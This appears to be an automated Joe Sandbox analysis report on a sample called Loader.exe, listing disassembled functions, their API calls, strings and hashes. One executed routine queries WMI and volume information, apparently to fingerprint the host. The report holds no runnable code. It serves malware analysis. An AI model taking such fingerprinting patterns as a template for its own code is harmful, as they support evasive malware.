Opcode Fuzzy Hash: 2ec7f84db76742806daed54dec7e80947df9411042d6aa21287cb87291b60e41
Instruction Fuzzy Hash: C8214971A04615AF9B20BFA58D8197BB7ADFF043A4B10C529FC5997251EB30EC52CBA0

Function 00A72BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62d61d0f55e0c1de9f99f0772b79116db0dd0b91c807170f4426d87b38da34ff
Instruction ID: 00bb091ea908a6fa78bf4402a64e1aca65b1330daf56ea27e254d175ef5f384a
Opcode Fuzzy Hash: 62d61d0f55e0c1de9f99f0772b79116db0dd0b91c807170f4426d87b38da34ff
Instruction Fuzzy Hash: FF21CD71204205AFDB22AFB5CD90A6E77A8FFA03A4B10C529F85D97250EB30EC50C7A0

Function 00A831BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00A831C6

Part of subcall function 00A7C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00A7D895,?,00000000,-00000008), ref: 00A7C082

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A831FE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A8321E

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: b71d1a17b75f7d43204bf5d5b2ce3fb6deffd3288ff8f5c4888f78888a29d0dc
Instruction ID: ec1fd254cad5b85a14ca9e709afa38019965317abf40ac1e68b9277712781818
Opcode Fuzzy Hash: b71d1a17b75f7d43204bf5d5b2ce3fb6deffd3288ff8f5c4888f78888a29d0dc
Instruction Fuzzy Hash: B711D2F2A025197EAB2137B69D8ADFF6A6CDEA5B947108025FA05D1100FF64DF0182B1

Function 00A6E892 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A6E899
std::_Lockit::_Lockit.LIBCPMT ref: 00A6E8A3
int.LIBCPMT ref: 00A6E8BA

Part of subcall function 00A6C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00A6C1F6
Part of subcall function 00A6C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00A6C210

std::_Lockit::~_Lockit.LIBCPMT ref: 00A6E914

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: eac22b5fe8e8e63d99b39b6309b85145b99bb2603a2f3c6ad8da17ff56e51bc3
Instruction ID: eb02c8ed2b923fd73248b20435ec8ca557fe320b61752efea3f610d6c79af024
Opcode Fuzzy Hash: eac22b5fe8e8e63d99b39b6309b85145b99bb2603a2f3c6ad8da17ff56e51bc3
Instruction Fuzzy Hash: FF11C036A001199FCF05EBB4DA55ABDBBB1AF94724F250119F411AB2D2CF749E01CF91

Function 00A8ADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000), ref: 00A8ADB7
GetLastError.KERNEL32(?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000,?,?,?,00A83CD6,00000000), ref: 00A8ADC3

Part of subcall function 00A8AE20: CloseHandle.KERNEL32(FFFFFFFE,00A8ADD3,?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000,?,?), ref: 00A8AE30

___initconout.LIBCMT ref: 00A8ADD3

Part of subcall function 00A8ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00A8AD91,00A8A2DC,?,?,00A84390,?,00000000,00000000,?), ref: 00A8AE08

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000,?), ref: 00A8ADE8

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 50db343071c7fc3c48a0a066a4e5ade8fa50e5af813dafb6a49baa4af7468404
Instruction ID: d94a48af51fb2dcc5e2f3c9d4955b1ddf7624fe5f50f9c613b67ffc49b3fc1e6
Opcode Fuzzy Hash: 50db343071c7fc3c48a0a066a4e5ade8fa50e5af813dafb6a49baa4af7468404
Instruction Fuzzy Hash: 6BF0A536604529BBDF226FD5DC08A9A7F66FF587B2B044013FA1996120DB328861AB91

Function 00A704F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00A70507
GetCurrentThreadId.KERNEL32 ref: 00A70516
GetCurrentProcessId.KERNEL32 ref: 00A7051F
QueryPerformanceCounter.KERNEL32(?), ref: 00A7052C

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 5f9371ace77956c688fff65c05458b9a6b9de34c1106a434ea9f81869c924124
Instruction ID: 8469ece2d0871438aa6edb57d630cdbd0dadf4673bc1d9f1ba49452bfe42fd1f
Opcode Fuzzy Hash: 5f9371ace77956c688fff65c05458b9a6b9de34c1106a434ea9f81869c924124
Instruction Fuzzy Hash: 38F05F74E1020DEBCB00DBF5DA4999EBBF4FF1C200B914996A412E6110EA30AA45DB50

Function 00A80976 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A7C16A: GetLastError.KERNEL32(?,?,00A75495,00A98E38,0000000C), ref: 00A7C16E
Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000), ref: 00A7C210

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00A75BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00A80A35
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00A75BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00A80A6C

Strings

utf8, xrefs: 00A80B3E

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: f6ab14052957443b8d1c048afe1f7c5a0d9109f6b96be0ba457798bc9c149e71
Instruction ID: c5c65cec8a08501ec86d1d760e3931a4b1265349abe8ce7d1aaf1c95ba1446d4
Opcode Fuzzy Hash: f6ab14052957443b8d1c048afe1f7c5a0d9109f6b96be0ba457798bc9c149e71
Instruction Fuzzy Hash: D4513771B00705AADB69BB74CD86FBBB3A8EF05744F044429F55A97082FB70ED4887A1

Function 00A673E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::details::_Release_chore.LIBCPMT ref: 00A67526
___std_exception_copy.LIBVCRUNTIME ref: 00A67561

Part of subcall function 00A6AF37: CreateThreadpoolWork.KERNEL32(00A6B060,00A68A2A,00000000), ref: 00A6AF46
Part of subcall function 00A6AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00A6AF53

Strings

Fail to schedule the chore!, xrefs: 00A67551, 00A67560

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
String ID: Fail to schedule the chore!
API String ID: 3683891980-3313369819
Opcode ID: 4b6f0d90a63ce413cf334eff86d954b3b3823bb5c5b2eb7b44f662f556c7af92
Instruction ID: 02a0198b4016e901bf496ac898986edc6286690ee001938c909b39217255fe68
Opcode Fuzzy Hash: 4b6f0d90a63ce413cf334eff86d954b3b3823bb5c5b2eb7b44f662f556c7af92
Instruction Fuzzy Hash: F9519EB4A10218DFCF00DF94D948BAEBBB1FF08324F144129E81AAB391DB75A905CF91

Function 00A7B992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00A7B893,?,?,00000000,00000000,00000000,?), ref: 00A7B9B7

Strings

MOC, xrefs: 00A7B9C9
RCC, xrefs: 00A7B9D1

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: dd0604ccf391bee861b871f041a5501f7ffa1a995ee832b041f47a0cfa3d27ae
Instruction ID: d88288f33cc8fd44ce8738fca6342a4bbaeeb11bfe704af8befc82f9ce09302a
Opcode Fuzzy Hash: dd0604ccf391bee861b871f041a5501f7ffa1a995ee832b041f47a0cfa3d27ae
Instruction Fuzzy Hash: F94148B2900209EFCF16DF98CD81AAEBBB5BF48340F18C199FA18A7211D3359950DB61

Function 00A63E90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00A63EC6
std::_Lockit::~_Lockit.LIBCPMT ref: 00A64002

Part of subcall function 00A6ABC5: _Yarn.LIBCPMT ref: 00A6ABE5
Part of subcall function 00A6ABC5: _Yarn.LIBCPMT ref: 00A6AC09

Strings

bad locale name, xrefs: 00A63F46

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: LockitYarnstd::_$Lockit::_Lockit::~_
String ID: bad locale name
API String ID: 2070049627-1405518554
Opcode ID: ab5ddf7109b9ef93f5d174c74918f65274bcf74507114aa878fbc7a3e097f2c4
Instruction ID: 2b77fc916c62b8e3ff9a9f8a59e32dc08e450454c8de153ef27cc4d4fbca1c6d
Opcode Fuzzy Hash: ab5ddf7109b9ef93f5d174c74918f65274bcf74507114aa878fbc7a3e097f2c4
Instruction Fuzzy Hash: 9E418FF1A007459BEB10EF69C905B57BBF8BF04714F044629E4099B781E77AE518CBE1

Function 00A7B1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00A7B475

Strings

csm, xrefs: 00A7B508
csm, xrefs: 00A7B497

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 5f0a08c4774a36a94d3d5a9ca38ba0f370210d721d3d5bfa6b8ce0b8818a8d0f
Instruction ID: 5270dfc370027a0edac5da0e28ae1d9c1221e64e692c9fed6932fee5d586a612
Opcode Fuzzy Hash: 5f0a08c4774a36a94d3d5a9ca38ba0f370210d721d3d5bfa6b8ce0b8818a8d0f
Instruction Fuzzy Hash: 4F3107F2420219EBCF228F51CC44AAA7B76FF08718B18C65AF84D49122C332DD61DBA1

Function 00A6B831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00A6B8B9
RaiseException.KERNEL32(?,?,?,?,?), ref: 00A6B8DE

Part of subcall function 00A7060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00A6F354,02CB2C48,?,?,?,00A6F354,00A63D4A,00A9759C,00A63D4A), ref: 00A7066D

Part of subcall function 00A78353: IsProcessorFeaturePresent.KERNEL32(00000017,00A7C224), ref: 00A7836F

Strings

csm, xrefs: 00A6B86D

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: 863063ec7073d498657baa21a257700f873578e77445315763a59468ae39b794
Instruction ID: a0c841d329b6cf57befff0513035183101fbeae13c8d1e6c2652ffeb3931e870
Opcode Fuzzy Hash: 863063ec7073d498657baa21a257700f873578e77445315763a59468ae39b794
Instruction Fuzzy Hash: 1E21AC31E10218EBCF34EF99D945AEEB7BCAF40710F144419E506EB250CB70AD85CBA1

Function 00A6B46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00A62673

Strings

ios_base::badbit set, xrefs: 00A62650
bad array new length, xrefs: 00A62626

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ___std_exception_copy
String ID: bad array new length$ios_base::badbit set
API String ID: 2659868963-1158432155
Opcode ID: fb0abaa3755de8262d070ff83939471e215ffc181877965643ff10f27c5e9d7e
Instruction ID: eb1d3eddb6a26f4e1fdb884c3f7256f063db4edbc3dc734d24ca8c7d07bd4f22
Opcode Fuzzy Hash: fb0abaa3755de8262d070ff83939471e215ffc181877965643ff10f27c5e9d7e
Instruction Fuzzy Hash: E601BCB1614300ABDB04EF28D856A1A7BF4AF08318F01882DF45D9B341E775E804CB91

Function 00A62610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A7060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00A6F354,02CB2C48,?,?,?,00A6F354,00A63D4A,00A9759C,00A63D4A), ref: 00A7066D

___std_exception_copy.LIBVCRUNTIME ref: 00A62673

Strings

ios_base::badbit set, xrefs: 00A62650
bad array new length, xrefs: 00A62626

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: bad array new length$ios_base::badbit set
API String ID: 3109751735-1158432155
Opcode ID: fb4a3dcc6ae9f260a011df3fd74b16d871091adf93b3cd61472f9f8c26350b46
Instruction ID: 5828b73985da4892474a2de5ce16a56f2e60418cf8dc1164ecf5716b6fe3a1f9
Opcode Fuzzy Hash: fb4a3dcc6ae9f260a011df3fd74b16d871091adf93b3cd61472f9f8c26350b46
Instruction Fuzzy Hash: 6FF0D4F1614300ABD700AF18DD49B4BBBF4AB48718F018C1DF5999B340D3B5E444CB92

Analysis Process: Loader.exePID: 5396, Parent PID: 2612COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	29.6%
Total number of Nodes:	203
Total number of Limit Nodes:	14

Executed Functions

Function 004387D0 Relevance: 32.3, APIs: 11, Strings: 7, Instructions: 776
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C), ref: 00438A5F
SysAllocString.OLEAUT32(AF71AD7E), ref: 00438AD5
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B14
SysAllocString.OLEAUT32(5F8F5D8B), ref: 00438BB5
SysAllocString.OLEAUT32(4F0B4D1F), ref: 00438C4B
VariantInit.OLEAUT32(F2FDFCE7), ref: 00438CBE
SysFreeString.OLEAUT32(?), ref: 00438FAC
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438FE0

Strings

|}, xrefs: 00438C1D
$%&', xrefs: 00439081
&e?g, xrefs: 00438C0D
Rac, xrefs: 00438C05
xY`[, xrefs: 00438BD5
'y){, xrefs: 00438C15
UvW, xrefs: 00438BED

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: UvW$$%&'$&e?g$'y){$Rac$xY`[$|}
API String ID: 505850577-3935235898
Opcode ID: cedc0d122eda84c37e771d2f76dcedd7a404c4fffcf9a77079a05c5f669563b7
Instruction ID: 3c98ca3655e8fbad89b897cedc23f9ec929c21c5d575d6668501c9692a1c22de
Opcode Fuzzy Hash: cedc0d122eda84c37e771d2f76dcedd7a404c4fffcf9a77079a05c5f669563b7
Instruction Fuzzy Hash: 4D32F072A083408BD314CF64C8817ABFBE2EBD9714F18592EF5949B390DB78D905CB96

Function 0041052C Relevance: 23.5, APIs: 2, Strings: 11, Instructions: 707
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

G, xrefs: 00410D27
{, xrefs: 00410DCC
f, xrefs: 00410AE0
x, xrefs: 00410AE8
p, xrefs: 00410A5A
U, xrefs: 00410982
<, xrefs: 00410CAB
b, xrefs: 00410597
A, xrefs: 00410C3A
1, xrefs: 0041053F
[, xrefs: 00410C32

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: 1$<$A$G$U$[$b$f$p$x${
API String ID: 0-2596809943
Opcode ID: 06a85181474689744a2e3f55f7eab027660ec147f8b5799b2c8a475eacb6260e
Instruction ID: 977eae197484217fe3de983ef0328e02866eaecbdb9648841de3f436da40142b
Opcode Fuzzy Hash: 06a85181474689744a2e3f55f7eab027660ec147f8b5799b2c8a475eacb6260e
Instruction Fuzzy Hash: 3052907160C7808BD324DB38C5953AFBBE1ABD5314F148A2EE4DAD73C1DA7889858B47

Function 004230D3 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 470
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,D J, xrefs: 00423127
HN, xrefs: 00423661
>\:B, xrefs: 00423117
57B, xrefs: 004230DF
,@ F, xrefs: 0042311F
IF, xrefs: 00423557
DJ, xrefs: 00423659

Memory Dump Source

